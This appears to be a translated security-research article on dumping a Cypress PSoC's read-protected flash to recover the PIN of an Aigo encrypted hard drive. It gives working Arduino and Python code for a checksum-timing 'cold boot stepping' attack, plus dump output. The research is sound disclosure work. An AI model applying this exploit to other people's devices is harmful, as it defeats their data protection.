Reverse engineering and hacking the Aigo self-encrypting external HDD. Part 2: dumping the Cypress PSoC

This is the second and final part of the article on hacking self-encrypting external drives. Let me remind you that a colleague recently brought me a Patriot (Aigo) SK8671 hard drive and I decided to reverse it; now I'm sharing what came of it. Before reading further, be sure to read the first part of the article.

4. We start dumping the PSoC's internal flash
5. The ISSP protocol
– 5.1. What ISSP is
– 5.2. Demystifying vectors
– 5.3. Communicating with the PSoC
– 5.4. Identifying on-chip registers
– 5.5. Security bits
6. First (failed) attack: ROMX
7. Second attack: cold boot stepping
– 7.1. Implementation
– 7.2. Reading the result
– 7.3. Reconstructing the flash binary
– 7.4. Finding the PIN storage address
– 7.5. Dumping block No. 126
– 7.6. Recovering the PIN code
8. What next?
9. Conclusion



4. We start dumping the PSoC's internal flash

So, everything indicates (as we established in part one) that the PIN code is stored in the PSoC's internal flash. Therefore we need to read that flash. The work required up front:

  • take control of the microcontroller's "communication" interface;
  • find a way to check whether that interface is protected against external reads;
  • find a way to bypass the protection.

There are two places where it makes sense to look for the correct PIN code:

  • the internal flash memory;
  • SRAM, where the PIN code may be held for comparison with the PIN the user enters.

Looking ahead, I'll say that I did manage to dump the PSoC's internal flash, bypassing its security mechanism with a hardware attack called "cold boot stepping", after reverse-engineering undocumented capabilities of the ISSP protocol. This allowed me to dump the actual PIN code directly.

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

Final program code:

5. The ISSP protocol

5.1. What ISSP is

"Communication" with a microcontroller can mean various things: it differs from vendor to vendor, and can be as simple as interaction over a serial protocol (for example, ICSP for Microchip's PIC).

Cypress has its own protocol for this, called ISSP (in-system serial programming), which is partially described in a technical specification. Patent US7185162 also provides some information. There is also an open-source equivalent called HSSP (which I'll use a little later). ISSP works as follows:

  • reset the PSoC;
  • output a magic number on this PSoC's serial data pin to enter external programming mode;
  • send commands, which are long bit strings called "vectors".

The ISSP documentation defines these vectors only for a small set of commands:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111, where dddddddd = block #
  • BULK-ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1, where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111, where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, where DDDDDDDDDDDDDDDD = data out: device checksum
  • ERASE-BLOCK

For example, the vector for Initialize-2:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

All vectors have the same length: 22 bits. The HSSP documentation has some additional information about ISSP: "An ISSP vector is nothing more than a bit sequence representing a set of instructions."

5.2. Demystifying vectors

Let's figure out what is going on here. At first I assumed these vectors were simply raw forms of M8C instructions, but after checking this hypothesis I found that the opcodes of the operations did not match.

Then I googled the vector above and came across this study, whose author, although he does not go into detail, gives some useful hints: "Each instruction begins with three bits that correspond to one of four mnemonics (read RAM, write RAM, read register, write register). Then come 8 address bits, followed by 8 data bits (read or write), and finally three stop bits."

Then I was able to gather some very useful information from the Supervisory ROM (SROM) section of the technical reference manual. The SROM is a hard-coded ROM in the PSoC that provides utility functions (similar to syscalls) for program code running in user space:

  • 00h: SWBootReset
  • 01h: ReadBlock
  • 02h: WriteBlock
  • 03h: EraseBlock
  • 06h: TableRead
  • 07h: CheckSum
  • 08h: Calibrate0
  • 09h: Calibrate1

By comparing the vector names with the SROM functions, we can map the various operations supported by the protocol onto the expected SROM parameters. Thanks to this, we can decode the first three bits of the ISSP vectors:

  • 100 => "wrmem"
  • 101 => "rdmem"
  • 110 => "wrreg"
  • 111 => "rdreg"

However, a full understanding of what happens on the chip can only be obtained by communicating directly with the PSoC.

5.3. Communicating with the PSoC

Since Dirk Petrautsky had already ported Cypress's HSSP code to Arduino, I used an Arduino Uno to connect to the ISSP connector on the keyboard board.

Note that during my research I modified Dirk's code somewhat. You can find my modification on GitHub: here, and the matching Python script for communicating with the Arduino is in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the "official" vectors for "communication". I tried to read the internal ROM using the VERIFY command. As expected, I could not do it. This is probably due to the read-protection bits being enabled inside the flash.

Then I created a few simple vectors of my own for writing and reading memory/registers. Note that we can read the entire SROM even though the flash is protected!

5.4. Identifying on-chip registers

After looking at the "disassembled" vectors, I found that the hardware uses undocumented registers (0xF8-0xFA) to specify M8C opcodes, which are executed directly, bypassing the protection. This allowed me to run various opcodes such as "ADD", "MOV A,X", "PUSH" or "JMP". Thanks to them (by looking at the side effects they have on the registers), I was able to determine which of the undocumented registers are actually the regular registers (A, X, SP and PC).

As a result, the "disassembled" code produced by the HSSP_disas.rb tool looks like this (I added comments for clarity):

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00       # reset flags
[DE C0 1C] wrreg SP (f6), 0x00          # reset SP
[9F 07 5C] wrmem KEY1, 0x3A             # mandatory argument for SSC
[9F 20 7C] wrmem KEY2, 0x03             # likewise
[DE A0 1C] wrreg PCh (f5), 0x00         # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03         # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80          # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30        # opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01          # BLOCK ID for the SSC call
[DE 00 DC] wrreg A (f0), 0x06           # "syscall" number: TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # undocumented operation: execute external opcode
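As an added example (not code from the article or from its cypress_psoc_tools repository), here is a Python decoder/encoder for the 22-bit vectors as worked out in sections 5.2 and 5.4: it splits a vector into mnemonic, address and data, reproduces the 3-byte form, and reprints the Initialize-2 vector in the notation of the listing above. The register and RAM names come from that listing; the read-vector framing (Z, 8 data bits, Z, 1) follows the READ-BYTE definition.

```python
MNEMONICS = {"100": "wrmem", "101": "rdmem", "110": "wrreg", "111": "rdreg"}
MNEMONIC_BITS = {name: bits for bits, name in MNEMONICS.items()}

# M8C register file (0xF0-0xFF) and SROM parameter block in RAM, named as in
# the listing above.
REG_NAMES = {0xF0: "A", 0xF3: "X", 0xF4: "PCl", 0xF5: "PCh", 0xF6: "SP",
             0xF7: "CPU_F", 0xF8: "opc0", 0xF9: "opc1", 0xFA: "opc2",
             0xFF: "CPU_SCR0"}
RAM_NAMES = {0xF8: "KEY1", 0xF9: "KEY2", 0xFA: "BLOCKID", 0xFB: "POINTER"}

# The Initialize-2 vector quoted in the article: 13 x 22 bits.
INIT2 = """
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111
""".split()


def decode_vector(bits):
    """Return (mnemonic, address, data) for one 22-bit vector string.

    Write vectors: mmm aaaaaaaa dddddddd 111.
    Read vectors:  mmm aaaaaaaa Z DDDDDDDD Z 1, where the D cycles are driven
    by the chip: data is None for the template form, or the value if the
    caller substitutes the captured bits.
    """
    if len(bits) != 22:
        raise ValueError("ISSP vectors are 22 bits, got %d" % len(bits))
    if bits[:3] not in MNEMONICS:
        raise ValueError("unknown mnemonic bits %r" % bits[:3])
    mnem = MNEMONICS[bits[:3]]
    addr = int(bits[3:11], 2)
    if mnem.startswith("wr"):
        if bits[19:] != "111":
            raise ValueError("write vector must end with the 111 stop bits")
        return mnem, addr, int(bits[11:19], 2)
    if bits[11] != "Z" or bits[20:] != "Z1":
        raise ValueError("read vector must be framed as Z<8 data bits>Z1")
    data = bits[12:20]
    return mnem, addr, None if "D" in data else int(data, 2)


def encode_vector(mnem, addr, data=None):
    """Inverse of decode_vector; read vectors get the DDDDDDDD placeholder."""
    head = MNEMONIC_BITS[mnem] + format(addr & 0xFF, "08b")
    if mnem.startswith("wr"):
        return head + format(data & 0xFF, "08b") + "111"
    return head + "Z" + "D" * 8 + "Z1"


def vector_bytes(bits):
    """The [xx xx xx] form: the 22 bits left-aligned in 3 bytes and padded
    with two zero bits (Z and D cycles shown as 0)."""
    padded = bits.replace("Z", "0").replace("D", "0") + "00"
    return bytes(int(padded[i:i + 8], 2) for i in range(0, 24, 8))


def disassemble(bits):
    """One listing line, e.g. '[DE E0 1C] wrreg CPU_F (f7), 0x00'."""
    mnem, addr, data = decode_vector(bits)
    if mnem.endswith("reg"):
        name = REG_NAMES.get(addr)
        where = "%s (%02x)" % (name, addr) if name else "0x%02X" % addr
    else:
        where = RAM_NAMES.get(addr, "0x%02X" % addr)
    hexbytes = " ".join("%02X" % b for b in vector_bytes(bits))
    line = "[%s] %s %s" % (hexbytes, mnem, where)
    return line if data is None else line + ", 0x%02X" % data


def disassemble_all(vectors=INIT2):
    return [disassemble(v) for v in vectors]


if __name__ == "__main__":
    print("--== init2 ==--")
    for line in disassemble_all():
        print(line)
```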

5.5. Security bits

At this stage I can already communicate with the PSoC, but I still have no reliable information about the flash's security bits. I was very surprised that Cypress gives the user no way to check whether the protection is active. I dug deeper into Google and finally understood that the HSSP code provided by Cypress had been updated after Dirk released his modification. And indeed! This new vector appeared:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00     # unknown arguments
[9F E0 1C] wrmem 0xFF, 0x00     # likewise
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # undocumented syscall!
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Using this vector (see read_security_data in psoc.py), we get all the security bits in SRAM at 0x80, with two bits per protected block.

The result is disheartening: everything is protected in "disable external read and write" mode. So not only can we not read anything from the flash, we cannot write anything either (for example, to install a ROM dumper there). The only way to disable the protection is to erase the entire chip. 🙁

6. First (failed) attack: ROMX

However, we can try the following trick: since we are able to execute arbitrary opcodes, what stops us from executing ROMX, which is used to read flash memory? This approach has a good chance of success, because the ReadBlock function that reads SROM data (used by the vectors) checks whether it was called from ISSP or not. The ROMX opcode, however, cannot plausibly have such a check. So here is the Python code (after adding a few helper functions to the Arduino code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)         # A = high byte of the address
    write_reg(0xF3, i&0xFF)       # X = low byte of the address
    exec_opcodes("\x28\x30\x40")  # ROMX, HALT, NOP
    byte = read_reg(0xF0)         # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])   # print ROM byte

Unfortunately, this code doesn't work. 🙁 Or rather, it works, but in the output we get our own opcodes (0x28 0x30 0x40)! I don't think the corresponding hardware feature is part of the read protection. It is more likely an engineering trick: when executing external opcodes, the ROM bus is redirected to a temporary buffer.

7. Second attack: cold boot stepping

Since the ROMX trick did not work, I started thinking about another variant of this trick, described in the paper "Shedding too much Light on a Microcontroller's Firmware Protection".

7.1. Implementation

The ISSP documentation gives the following vector for CHECKSUM-SETUP:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This essentially calls SROM function 0x07, described in the documentation as follows (emphasis mine):

The checksum function computes a 16-bit checksum over a user-defined number of blocks within a single flash bank, starting from zero. The BLOCKID parameter is used to pass the number of blocks to use when computing the checksum. A value of "1" computes the checksum of block zero only, while "0" causes the checksum of all 256 blocks of the flash bank to be computed. The 16-bit checksum is returned in KEY1 and KEY2. The KEY1 parameter holds the low-order 8 bits of the checksum and the KEY2 parameter holds the high-order 8 bits. For devices with multiple flash banks, the checksum function is called for each bank individually. The bank number it operates on is set by the FLS_PR1 register (by setting the bit in it that corresponds to the target bank).

Note that this is a simple checksum: the bytes are simply added one to another; there is no fancy CRC. Moreover, knowing that the M8C core has a very small register set, I assumed that while the checksum is being computed, the intermediate value is written to the same variables that ultimately end up in the output: KEY1 (0xF8) / KEY2 (0xF9).

So in theory my attack looks like this:

  1. Connect via ISSP.
  2. Start the checksum computation using the CHECKSUM-SETUP vector.
  3. Reset the processor after a certain time T.
  4. Read RAM to get the current checksum C.
  5. Repeat steps 3 and 4, increasing T a little each time.
  6. Recover the flash data by subtracting the previous checksum C from the current one.

However, there is a problem: the Initialize-1 vector, which we have to send after a reset, overwrites KEY1 and KEY2:

1100101000000000000000  # magic that puts the PSoC into programming mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A     # the checksum is overwritten here
[9F 20 7C] wrmem KEY2, 0x03     # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This code overwrites our precious checksum by calling Calibrate1 (SROM function 9). And yes, it works! The Arduino code that carries out this attack is simple:

case Cmnd_STK_START_CSUM:
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();
    if(checksum_delay)
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();

  1. Read checksum_delay.
  2. Start the checksum computation (send_checksum_v).
  3. Wait a certain time, keeping in mind the following problems:
    • I lost a lot of time before I found out that delayMicroseconds works correctly only for delays no greater than 16383 µs;
    • and then wasted the same amount of time again before I found out that delayMicroseconds, if passed 0 as input, works completely wrong!
  4. Reset the PSoC into programming mode (we send the magic number, without sending the init vectors).

The final Python code:

for delay in range(0, 150000):  # delay in microseconds
    for i in range(0, 10):      # number of reads for each delay value
        try:
            reset_psoc(quiet=True)  # reset and enter programming mode
            send_vectors()      # send the init vectors
            ser.write("\x85"+struct.pack(">I", delay)) # compute checksum + reset after the delay
            res = ser.read(1)       # read the Arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # reopen the serial port
            continue
        print "%05d %02X %02X %02X" % (delay,      # read the RAM bytes
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

To sum up, what this code does:

  1. Resets the PSoC (and sends the magic number).
  2. Sends the full set of init vectors.
  3. Calls the Arduino function Cmnd_STK_START_CSUM (0x85), passing the delay in microseconds as a parameter.
  4. Reads the checksum (0xF8 and 0xF9) and the undocumented register 0xF1.

This code is executed 10 times for each 1 µs delay value. 0xF1 is included here because it was the only register that changed while the checksum was being computed. It may be some kind of temporary variable used by the arithmetic logic unit. Note the ugly hack I use to reset the Arduino with picocom when the Arduino stops showing signs of life (no idea why that happens).

7.2. Reading the result

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1: the unknown register mentioned above
                # F8: low byte of the checksum
                # F9: high byte of the checksum

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # the checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1st byte: 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte: 0xE7-0x80 = 0x67
00057 CC E7 00
00057 01 17 01  # no idea what is going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 again?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmmmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Ah, got it! That is the carry into the high byte
00063 01 17 01
[...]
00075 CC 17 01  # So, 0x117-0xE7 = 0x30

That said, we have a problem: since we are working with real checksums, a null byte does not change the value read. However, since the entire computation (8192 bytes) takes 0.1478 seconds (with slight variations on each run), which corresponds to approximately 18.04 µs per byte, we can use this timing to check the checksum value at the right moments. For the first bytes, everything reads off easily, since the duration of the computation procedure is always nearly the same. However, the end of this dump is less accurate, because the "small timing deviations" of each run add up and become significant:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

That is 10 dumps per microsecond of delay. The total running time to dump all 8192 bytes of the flash is about 48 hours.

7.3. Reconstructing the flash binary

I have not yet finished writing the code that will fully reconstruct the program code from the flash, taking every deviation into account. However, I have already recovered the beginning of this code. To make sure I did it correctly, I disassembled it with m8cdis:

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

Looks plausible!

7.4. Finding the PIN storage address

Now that we can read the checksum at the moments we need, we can simply check how and where it changes when we:

  • enter a wrong PIN;
  • change the PIN.

First, to find the approximate storage address, I took checksum dumps at 10 ms increments after reset. Then I entered a wrong PIN and did the same.

The result was not very encouraging, since there were many changes. But in the end I was able to determine that the checksum changed somewhere between 120000 µs and 140000 µs of delay. But the "pincode" I saw there was completely wrong, because of an artifact of the delayMicroseconds procedure, which does strange things when passed 0.

Then, after spending almost 3 hours on this, I remembered that the SROM CheckSum system call takes as an argument the number of blocks to checksum! So we can easily localize the storage address of the PIN code and the "failed attempts" table down to a 64-byte block.

My first run gave the following result:

[image: checksum dump screenshot]

Then I changed the PIN from "123456" to "1234567" and got:

[image: checksum dump screenshot]

So the PIN code and the bad-attempts table appear to be stored in block number 126.

7.5. Dumping block No. 126

Block #126 should be located around 125x64x18 = 144000 µs from the start of the checksum computation in my full dump, and that looks plausible. Then, after manually filtering out many invalid dumps (due to the accumulation of "small timing deviations"), I ended up getting these bytes (at 145527 µs):

[image: dump of block 126]

It is obvious that the PIN is stored unencrypted! These values, of course, are not written in ASCII, but as it turns out, they reflect the readings taken from the capacitive keypad.

Finally, I ran some more tests to find out where the bad-attempts table is stored. Here is the result:

[image: dump of the bad-attempts table]

0xFF means "15 attempts", and it decrements on each failed attempt.

7.6. Recovering the PIN code

Here is my ugly code for the above:

def dump_pin():
  # keypad scan codes -> digits (see the dump of block 126 above)
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  for delay in range(145495, 145719, 16):   # one byte period per step
    csum = csum_at(delay, 1)                # checksum read after `delay` us (helper from psoc.py)
    byte = (csum-last_csum)&0xFF            # the byte added since the previous sample
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:
      print pin_map[pin_bytes[i]],
  print

Here is the result of running it:

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

Hooray! It works.

Note that the delay values I used probably apply only to one specific PSoC: the one I used.
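As an added example (not code from the article's psoc.py), the byte-recovery arithmetic of sections 7.2 and 7.6 in one place: majority-vote over the repeated reads at each delay and take the difference between consecutive 16-bit checksums, and, for samples taken one byte period apart as dump_pin does, map the recovered bytes back to PIN digits. The dump lines and checksum list are copied from the article's output; the 17 µs start delay and the vote over jittery reads are assumptions of this example.

```python
from collections import Counter

# Constructed from the stepping loop's output above: DELAY F1 F8 F9
# (F8 = low byte of the checksum in KEY1, F9 = high byte in KEY2,
# F1 = the unknown register).
SAMPLE_DUMP = """\
00016 F9 00 03
00016 F9 00 00
00017 FB 00 00
00023 F8 00 00
00024 80 80 00
00024 80 80 00
00024 80 80 00
00057 CC E7 00
00057 CC E7 00
00057 01 17 01
00058 F8 E7 00
00058 D0 17 01
00058 D0 17 01
00063 01 17 01
00075 CC 17 01
"""

# Keypad scan codes of the PIN pad, as recovered in section 7.6.
PIN_MAP = {0x24: "0", 0x25: "1", 0x26: "2", 0x27: "3", 0x20: "4", 0x21: "5",
           0x22: "6", 0x23: "7", 0x2C: "8", 0x2D: "9"}


def parse_dump(text):
    """Group the 16-bit checksum (KEY2:KEY1) of every line by delay."""
    by_delay = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        delay, _f1, f8, f9 = fields
        csum = (int(f9, 16) << 8) | int(f8, 16)
        by_delay.setdefault(int(delay), []).append(csum)
    return by_delay


def vote(values):
    """Majority value among the repeated reads at one delay: timing jitter
    makes a minority of reads land one byte early or late."""
    return Counter(values).most_common(1)[0][0]


def recover_by_change(by_delay, start_delay):
    """Bytes added between consecutive *changes* of the voted checksum,
    starting at a delay where the sum is known to be zero.  A 0x00 byte
    leaves the sum unchanged and is invisible here; the carry into KEY2 does
    not matter because only the low 8 bits of the difference are a flash byte."""
    out, prev = [], None
    for delay in sorted(by_delay):
        if delay < start_delay:
            continue
        cur = vote(by_delay[delay])
        if prev is not None and cur != prev:
            out.append((cur - prev) & 0xFF)
        prev = cur
    return out


def recover_by_period(checksums):
    """Bytes from checksums sampled exactly one byte period apart (what
    dump_pin does with its 16 us step): every step yields one byte, so an
    unchanged sum means 0x00.  The first value is relative to 0, like the
    article's last_csum = 0, so out[0] is only meaningful if sampling began
    at the start of the block."""
    out, last = [], 0
    for csum in checksums:
        out.append((csum - last) & 0xFF)
        last = csum
    return out


def pin_from_bytes(byte_list):
    """Keep only bytes that are keypad codes and translate them to digits."""
    return "".join(PIN_MAP[b] for b in byte_list if b in PIN_MAP)


if __name__ == "__main__":
    first = recover_by_change(parse_dump(SAMPLE_DUMP), 17)
    print("first flash bytes:", " ".join("%02x" % b for b in first))
    csums = [0x53E2, 0x5407, 0x542D, 0x5454, 0x5474, 0x5495, 0x54B7,
             0x54DA, 0x5506, 0x5506, 0x5533, 0x554C, 0x554E, 0x554E]
    print("PIN:", pin_from_bytes(recover_by_period(csums)))
```

The first three recovered bytes, 80 67 30, are the `jmp 0068h` reset vector and the start of the next instruction in the m8cdis listing of section 7.3.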

8. What next?

So, let's summarize the PSoC side in the context of the Aigo drive:

  • we can read SRAM even when read protection is enabled;
  • we can bypass the anti-dump protection with the cold boot stepping attack and read the PIN code directly.

However, our attack has flaws due to synchronization problems. They could be fixed as follows:

  • write a utility to correctly decode the output data obtained from the "cold boot stepping" attack;
  • use an FPGA to generate more precise delays (or use the Arduino's hardware timers);
  • try another attack: deliberately enter a wrong PIN, reset and dump the RAM, hoping that the correct PIN is held in RAM for comparison. However, this is not easy to do with an Arduino, since the Arduino's signal level is 5 volts, while the board we are examining works with 3.3-volt signals.

One interesting thing to try would be to play with the voltage level to bypass the read protection. If this approach worked, we could obtain exact data from the flash, instead of relying on checksum reads with imprecise delays.

Since the SROM probably reads the guard bits using the ReadBlock system call, we could do something similar to what is described on Dmitry Nedospasov's blog: a re-implementation of Chris Gerlinski's attack, presented at the REcon Brussels 2017 conference.

Another interesting thing to do would be to decap the chip: take an SRAM dump, and look for undocumented system calls and vulnerabilities.

9. Conclusion

So, the protection of this drive leaves much to be desired, because it uses a regular (not "hardened") microcontroller to store the PIN code... Plus, I have not looked (yet) at how data encryption works in this device!

What can I recommend to Aigo? After analyzing several models of encrypted HDD drives, in 2015 I gave a presentation at SyScan that examined the security problems of several external HDD drives and recommended what could be improved in them. 🙂

I spent two weeks of Sundays and several evenings on this research. About 40 hours in total, counting from the very beginning (when I opened the drive) to the end (dumping the PIN code). The same 40 hours include the time I spent writing this article. It was a very interesting journey.

Source: www.habr.com
